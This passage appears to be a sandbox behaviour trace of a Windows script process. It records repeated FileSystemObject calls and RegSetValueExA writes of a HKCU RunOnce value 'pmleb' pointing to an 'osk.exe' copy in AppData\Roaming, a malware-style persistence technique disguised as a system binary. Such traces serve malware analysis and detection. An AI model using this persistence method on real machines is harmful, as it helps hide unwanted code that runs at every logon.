[0081.361] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.362] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x31 [0081.362] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.362] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x32 [0081.362] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.363] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x31 [0081.363] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.363] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.363] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.363] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.363] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.363] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.363] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.363] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.363] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.363] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.364] RegCloseKey (hKey=0x280) returned 0x0 [0081.364] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.364] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.364] SetTimer (hWnd=0x20280, nIDEvent=0x20ad, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ad [0081.364] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.376] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.376] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.376] KillTimer (hWnd=0x20280, uIDEvent=0x20ad) returned 1 [0081.376] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.376] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.376] IUnknown:Release (This=0x787518) returned 0x1 [0081.376] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.376] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.377] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.377] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.377] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.377] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.377] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.377] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.377] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.377] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x32 [0081.377] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.377] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x33 [0081.377] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.378] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x32 [0081.378] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.378] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.379] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.379] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.379] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.379] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.379] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.379] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.379] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.379] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.379] RegCloseKey (hKey=0x280) returned 0x0 [0081.380] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.380] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.380] SetTimer (hWnd=0x20280, nIDEvent=0x20ae, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ae [0081.380] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.391] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.391] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.391] KillTimer (hWnd=0x20280, uIDEvent=0x20ae) returned 1 [0081.391] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.391] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.391] IUnknown:Release (This=0x787518) returned 0x1 [0081.391] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.391] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.392] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.392] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.392] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.392] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.392] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.392] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.392] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.392] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x33 [0081.392] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.392] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x34 [0081.392] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.393] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x33 [0081.393] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.393] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.393] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.393] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.394] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.394] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.394] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.394] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.394] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.394] RegCloseKey (hKey=0x280) returned 0x0 [0081.394] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.394] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.395] SetTimer (hWnd=0x20280, nIDEvent=0x20af, uElapse=0xa, lpTimerFunc=0x0) returned 0x20af [0081.395] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.406] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.406] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.407] KillTimer (hWnd=0x20280, uIDEvent=0x20af) returned 1 [0081.407] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.407] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.407] IUnknown:Release (This=0x787518) returned 0x1 [0081.407] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.407] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.407] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, 